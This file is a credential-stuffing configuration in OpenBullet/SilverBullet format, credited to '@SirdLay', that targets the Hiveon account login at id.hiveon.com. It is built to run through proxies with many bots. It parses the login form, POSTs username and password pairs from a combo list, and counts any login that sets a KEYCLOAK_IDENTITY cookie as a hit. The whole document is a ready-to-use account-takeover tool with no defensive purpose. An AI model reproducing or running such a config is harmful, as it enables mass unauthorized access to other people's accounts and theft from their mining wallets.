[SETTINGS]
{
  "Name": "Hiveon",
  "SuggestedBots": 30,
  "MaxCPM": 0,
  "LastModified": "2022-05-28T15:37:46.9067318+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@SirdLay",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://id.hiveon.com/auth" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#URL PARSE "<SOURCE>" LR "https://id.hiveon.com/auth/realms/id/login-actions/authenticate?" "\"" -> VAR "URL" 

FUNCTION Replace "amp;" "" "<URL>" -> VAR "CURL" 

REQUEST POST "https://id.hiveon.com/auth/realms/id/login-actions/authenticate?<CURL>" 
  CONTENT "X-Client-ID=1757418380&username=<USER>&password=<PASS>&credentialId=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 95" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: null" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES(KEYCLOAK_IDENTITY)>" Exists 
  KEYCHAIN Failure OR 
    KEY "<COOKIES(KEYCLOAK_IDENTITY)>" DoesNotExist 

!REQUEST GET "https://id.hiveon.com/auth/realms/id/account" 
!  
!  HEADER ": scheme: https" 
!  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
!  HEADER "accept-encoding: gzip, deflate, br" 
!  HEADER "accept-language: en-US,en;q=0.9" 
!  HEADER "cache-control: max-age=0" 
!  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"" 
!  HEADER "sec-ch-ua-mobile: ?0" 
!  HEADER "sec-ch-ua-platform: \"Windows\"" 
!  HEADER "sec-fetch-dest: document" 
!  HEADER "sec-fetch-mode: navigate" 
!  HEADER "sec-fetch-site: same-origin" 
!  HEADER "sec-fetch-user: ?1" 
!  HEADER "upgrade-insecure-requests: 1" 
!  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47" 

